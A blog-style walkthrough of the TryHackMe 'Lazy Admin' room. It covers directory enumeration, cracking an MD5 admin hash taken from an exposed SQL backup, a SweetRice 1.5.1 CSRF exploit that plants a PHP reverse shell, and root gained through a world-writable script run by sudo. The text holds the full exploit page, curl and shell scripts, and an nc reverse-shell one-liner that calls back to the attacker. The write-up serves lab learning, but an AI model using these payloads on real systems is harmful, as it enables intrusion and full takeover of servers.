Lazy Admin — CTF Walkthrough — TryHackMe

Hello everyone! Welcome back to another blog. Today we're going to solve the Lazy Admin room on TryHackMe. As the name suggests, the admin of something has been lazy and misconfigured it, and our task is to find that misconfiguration. So, without wasting time, let's start...

Logo - Lazy Admin

Enumeration:

As usual, our first step after booting the target is enumeration. We'll start with an nmap scan (default scripts plus version detection).

nmap -sC -sV <ip>

We found that ports 22 and 80 are open, running SSH and HTTP respectively.

We can't do anything with SSH yet because we don't have credentials, so let's browse to the IP.

Browsing to the target's IP address shows the default Apache web server page.

http://<ip>/

Nothing interesting here, and the page source is equally empty.

Now let's find out whether any hidden directories exist on the web server. I'm using gobuster with the dirbuster wordlist.

gobuster dir -u http://<ip>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We found a directory called ‘/content’. Let’s check it out.

http://<ip>/content/

Oh! It's a separate website, and as you can see it runs the SweetRice CMS (website management system). There's a notice for the webmaster: "If you are the webmaster, ...", so there must be a login function somewhere. I checked this page's source as well and found nothing.

So the only way forward is to brute-force directories again, this time inside '/content'. I used multiple wordlists, but I'm showing only the one that gave useful results.

gobuster dir -u http://<ip>/content/ -w /usr/share/wordlists/dirb/common.txt

We found many more directories to look into. I visited each one and found only two of them interesting.

The first one is ‘/as’ which is the login form.

http://<ip>/content/as/

But we don't have valid creds yet, and trying some default user:password combinations failed.

Moving on to the next useful directory, '/inc'. It contains lots of files, but one of them stands out. I'll leave it to you to find it: open every file and directory there and you'll definitely spot it.

The interesting file is a SQL backup of the site's database, and it contains the admin username and hashed password. Leaving a database backup inside the web root is the first real misconfiguration on this box. The line below is the one from the file that holds the credentials:

14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"<hashed_password>\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

This is a PHP-serialized settings array (each entry is s:<length>:"<string>"), and the two entries that matter are admin => manager and passwd => the hash. So the username is manager. The password is hashed, so let's use hash-identifier to work out the algorithm.

It reports MD5: a 32-character hex digest with no salt. Using a website called md5hashing I got the plaintext password. (Submitting a hash to an online service hands it to a third party; john or hashcat with a wordlist cracks an unsalted MD5 like this offline just as quickly.)
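The two steps above (pulling the credentials out of the serialized settings row, then cracking the unsalted digest offline) as an added shell example, not code from the original walkthrough. The dump line it parses is a constructed, shortened copy of the global_setting row with a hash computed from a constructed password; the real backup file is longer and its hash is the one the room ships.

```shell
#!/bin/sh
# Added example: extract admin name + password hash from a SweetRice SQL backup
# and crack an unsalted MD5 against a wordlist, all offline.

# extract_field KEY FILE: value of the serialized entry s:N:"KEY";s:M:"VALUE".
# Inside the dump the quotes are escaped as \\" so the regex matches that form.
extract_field() {
    grep -oE "$1"'\\\\";s:[0-9]+:\\\\"[^\\"]*' "$2" | sed -E 's/.*\\\\"//'
}

# looks_like_md5 HASH: 32 hex chars and nothing else. That is all hash-identifier
# can see too; it cannot tell MD5 from any other 128-bit digest, so it is a guess.
looks_like_md5() {
    printf '%s' "$1" | grep -qE '^[0-9a-fA-F]{32}$'
}

# crack_md5 HASH WORDLIST: print the first word whose MD5 equals HASH, else fail.
crack_md5() {
    h=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r w || [ -n "$w" ]; do
        if [ "$(printf '%s' "$w" | md5sum | cut -d' ' -f1)" = "$h" ]; then
            printf '%s\n' "$w"
            return 0
        fi
    done < "$2"
    return 1
}

# --- constructed sample input (not the room's real dump or password) ---
work=$(mktemp -d)
sample_pw='Password123'
sample_hash=$(printf '%s' "$sample_pw" | md5sum | cut -d' ' -f1)

# Shortened global_setting row in the same escaped form as the real backup.
cat > "$work/dump.tmpl" <<'EOF'
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"HASH_PLACEHOLDER\\";s:5:\\"close\\";i:1;}\',\'1575023409\');',
EOF
sed "s/HASH_PLACEHOLDER/$sample_hash/" "$work/dump.tmpl" > "$work/dump.sql"

# Tiny constructed wordlist; point this at rockyou.txt on a real engagement.
printf '%s\n' admin 123456 letmein "$sample_pw" > "$work/words.txt"

user=$(extract_field admin "$work/dump.sql")
hash=$(extract_field passwd "$work/dump.sql")
echo "admin user: $user"
echo "password hash: $hash"
if looks_like_md5 "$hash"; then
    cracked=$(crack_md5 "$hash" "$work/words.txt") && echo "password: $cracked"
fi
```

The grep/sed pair works on the raw dump text, so it does not need PHP installed; if you do have it, `php -r 'var_dump(unserialize(...));'` on the blob gives the whole array at once.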

Now it's time to log in using the login page we found earlier at /content/as/. Remember it? Of course you do; it's an important finding.

Dashboard after logging into the website

We're in! In the top-left corner of the dashboard is the version in use: SweetRice 1.5.1.

Exploitation:

Let's use searchsploit to check whether there are public exploits for this version.

searchsploit sweetrice 1.5.1

It lists 5 entries. You can use any of them, but first understand what each one does and how to use it. I'm using the last one: Cross-Site Request Forgery / PHP Code Execution.

The exploit is the HTML file below (comment markers and quotes restored; the original uses plain ASCII quotes):

<!--
# Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution
# Date: 30-11-2016
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1

# Description :

# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerability In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; phpinfo();
Code You Can
Customize Exploit For Your Self .

# Exploit :
-->

<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
</textarea>
</form>
</body>
</html>

<!--
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php
-->

This exploit is just a self-submitting HTML form. When a logged-in admin's browser loads it, the form POSTs to the ad-saving endpoint (as/?type=ad&mode=save) with two fields: adk, the ad's name, and adv, the ad's body. SweetRice writes the body verbatim into /inc/ads/<adk>.php, here hacked.php, as the last line of the exploit says, so whatever PHP we put in adv runs on the server. So I'll edit the exploit and replace the sample PHP with code that gives me a reverse shell. You can get the PHP reverse shell code from here. Change the IP address in that script to your TryHackMe VPN IP and paste the whole script into the exploit file in place of the sample PHP. One more edit the exploit's comments don't mention: the form action points at http://localhost/sweetrice/as/, so change it to the real path on the target, http://<ip>/content/as/?type=ad&mode=save, or the request goes nowhere.

Now we're ready to exploit the target. Remember that the exploit only works while you're logged into SweetRice, because the forged request rides on your browser's session cookie; that is what makes it a CSRF. So log in with the credentials and keep that browser open in the background.

Now open the exploit file in the same browser. You'll be redirected to the ad management page of the site; if so, the request was accepted and hacked.php, containing our reverse-shell code, now exists under /content/inc/ads/.

But before requesting it, we should open a listener. Use netcat: nc -nlvp 1234

Port 1234 is the default in the reverse-shell script. If you changed it along with the IP address, use that port instead.

Now browse to http://<ip>/content/inc/ads/hacked.php and you should get a reverse shell back on the netcat listener.

nc -nlvp <port>

Yeah! We’ve got the reverse connection.
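The whole exploit step above, as an added shell example that is not from the walkthrough or the exploit-db entry: the CSRF page is only a wrapper around one authenticated POST, so once you hold an admin session you can send that request with curl and skip the browser. It assumes the site is at http://TARGET/content/, that you logged in at /content/as/ and copied the session cookie from the browser (PHP's default cookie name PHPSESSID is assumed; SweetRice's login fields are not on the page, so the script does not try to log in itself), that shell.php is your edited PHP reverse shell, and that nc is already listening in another terminal on the port it calls back to.

```shell
#!/bin/sh
# Added example: replay the SweetRice 1.5.1 "add ad" request with curl.
# TARGET, SESSID and shell.php are supplied by you; nothing here is the room's code.

ad_save_url() {   # $1 = target ip  -> the endpoint the exploit's form posts to
    printf 'http://%s/content/as/?type=ad&mode=save\n' "$1"
}

ad_file_url() {   # $1 = target ip, $2 = adk name -> where SweetRice writes the ad body
    printf 'http://%s/content/inc/ads/%s.php\n' "$1" "$2"
}

# deploy_ad TARGET SESSID NAME FILE: same two fields as the exploit page
# (adk = ad name, adv = ad body). "adv@FILE" makes curl URL-encode the file's
# contents, so the PHP survives intact. Prints the HTTP status: a redirect means
# the save went through, the login page (200) means the session was rejected.
deploy_ad() {
    curl -s -o /dev/null -w '%{http_code}\n' \
        -b "PHPSESSID=$2" \
        --data-urlencode "adk=$3" \
        --data-urlencode "adv@$4" \
        "$(ad_save_url "$1")"
}

# trigger_ad TARGET NAME: request the dropped file. The PHP connects back to
# your listener and never returns normally, so the HTTP request is expected to
# hang; a short timeout keeps the script moving.
trigger_ad() {
    curl -s -m 5 "$(ad_file_url "$1" "$2")" >/dev/null 2>&1 || true
}

# Usage:  TARGET=10.10.x.x SESSID=<cookie value> sh deploy.sh
# (only runs when both variables are set, so the functions can be sourced safely)
if [ -n "${TARGET:-}" ] && [ -n "${SESSID:-}" ]; then
    status=$(deploy_ad "$TARGET" "$SESSID" hacked shell.php)
    echo "save request returned HTTP $status"
    echo "triggering $(ad_file_url "$TARGET" hacked); check your nc listener"
    trigger_ad "$TARGET" hacked
fi
```

Because the endpoint accepts the write on nothing but the session cookie, the same request could be fired by any page the admin visits; that is the CSRF half of the bug, and the missing "ads must not contain PHP" check is the code-execution half.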

Privilege Escalation:

Do some basic enumeration on the target to find privilege-escalation vectors.

Found User Flag

As you can see, we're the user www-data, and our goal is root. Digging further reveals that we can run a Perl script as root with sudo, without a password.

$ sudo -l

Unfortunately, we don't have permission to edit the file we're allowed to run as root.

$ ls -l /home/itguy

So let's see what the script does when executed.

$ cat /home/itguy/backup.pl

This Perl script runs another script, /etc/copy.sh. Let's check whether we have permission to edit that one.

$ ls -l /etc/copy.sh

And yes! The file is world-writable, and you can see its contents. Do you know what the single command inside copy.sh does? It's a one-line bash reverse shell that connects back to 192.168.0.190:5554. Because backup.pl runs as root and calls copy.sh, anything we put in copy.sh also runs as root; a root-run script sourcing a world-writable file is the misconfiguration that hands us the box. So we just need to change the IP in the file to our TryHackMe IP.

To do that, copy the whole line into a text editor on your local Kali machine (or whichever distro you use), replace the IP with your TryHackMe IP, and copy the edited line again. In the reverse-shell terminal run cat > /etc/copy.sh and paste the line. Note that Ctrl+D won't bring you back to the $ prompt: in a bare netcat shell there is no tty on the other side, so Ctrl+D is not delivered to the remote cat as end-of-file and it never exits. Press Ctrl+C instead; that kills the reverse shell and drops you back to your Kali terminal, but cat has already written the line. Start the listener again with the same command as before, browse to http://<ip>/content/inc/ads/hacked.php again to get a new shell, and cat /etc/copy.sh: the file was edited and saved. (Writing the line into the file with a single echo and a redirect avoids the Ctrl+D problem entirely.)

Editing copy.sh file

Now we're ready to get root. Split the terminal and start another netcat listener, this time on port 5554 (or whatever port you put in copy.sh). Then, in the reverse-shell terminal, run:

sudo /usr/bin/perl /home/itguy/backup.pl

A second connection comes back to the new listener, and that one is a root shell!
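The privilege-escalation steps above, collected into an added shell example that is not from the walkthrough: the checks that make the chain work (can we write copy.sh, does sudo allow backup.pl without a password) and a way to rewrite /etc/copy.sh in one command instead of fighting cat and Ctrl+D. Run it inside the www-data reverse shell with ATTACKER_IP (and optionally ATTACKER_PORT) set. The reverse-shell one-liner it writes is a generic mkfifo/nc shell, not necessarily the exact line the room ships in copy.sh.

```shell
#!/bin/sh
# Added example: check the two preconditions, then overwrite /etc/copy.sh.
# ATTACKER_IP / ATTACKER_PORT are placeholders you set; defaults are constructed.

# reverse_shell_line IP PORT: a one-line reverse shell suitable for copy.sh.
reverse_shell_line() {
    printf 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc %s %s > /tmp/f\n' "$1" "$2"
}

# file_mode FILE: octal permission bits (GNU stat, with a BSD fallback).
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# writable_by_others FILE: true when the "other" write bit is set, i.e. any
# local user (www-data included) can change what root will later execute.
writable_by_others() {
    mode=$(file_mode "$1") || return 1
    case "$mode" in
        *[2367]) return 0 ;;
        *)       return 1 ;;
    esac
}

# sudo_nopasswd_backup: does sudo -l grant backup.pl without a password?
# -n makes sudo fail instead of prompting when a password would be required.
sudo_nopasswd_backup() {
    sudo -n -l 2>/dev/null | grep -q 'NOPASSWD.*/home/itguy/backup.pl'
}

target_file=/etc/copy.sh
if [ -n "${ATTACKER_IP:-}" ]; then
    port=${ATTACKER_PORT:-5554}
    if ! writable_by_others "$target_file"; then
        echo "$target_file (mode $(file_mode "$target_file")) is not writable by others" >&2
        exit 1
    fi
    echo "current $target_file:"; cat "$target_file"
    # Single redirect: no interactive cat, nothing to terminate with Ctrl+D.
    reverse_shell_line "$ATTACKER_IP" "$port" > "$target_file"
    echo "new $target_file:"; cat "$target_file"
    if sudo_nopasswd_backup; then
        echo "start 'nc -nlvp $port' on your box, then run:"
        echo "  sudo /usr/bin/perl /home/itguy/backup.pl"
    else
        echo "sudo -l does not show NOPASSWD for backup.pl; re-check enumeration" >&2
    fi
fi
```

The fix on the defending side is the mirror image of the checks: copy.sh owned by root with mode 644 (or 755), and no sudo rule that lets a web-server account run a root-owned script whose dependencies it can edit.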

Getting root shell on the target

So yes! We finally have a root shell, and we captured the root flag with it.

That was the walkthrough for the TryHackMe room LazyAdmin. I hope the methodology was clear and that you enjoyed it. The box itself is easy, but explaining each step made the write-up a bit long. If you've read this far, thank you very much, and if you have any suggestions about my write-ups, let me know in the comments :)

Learner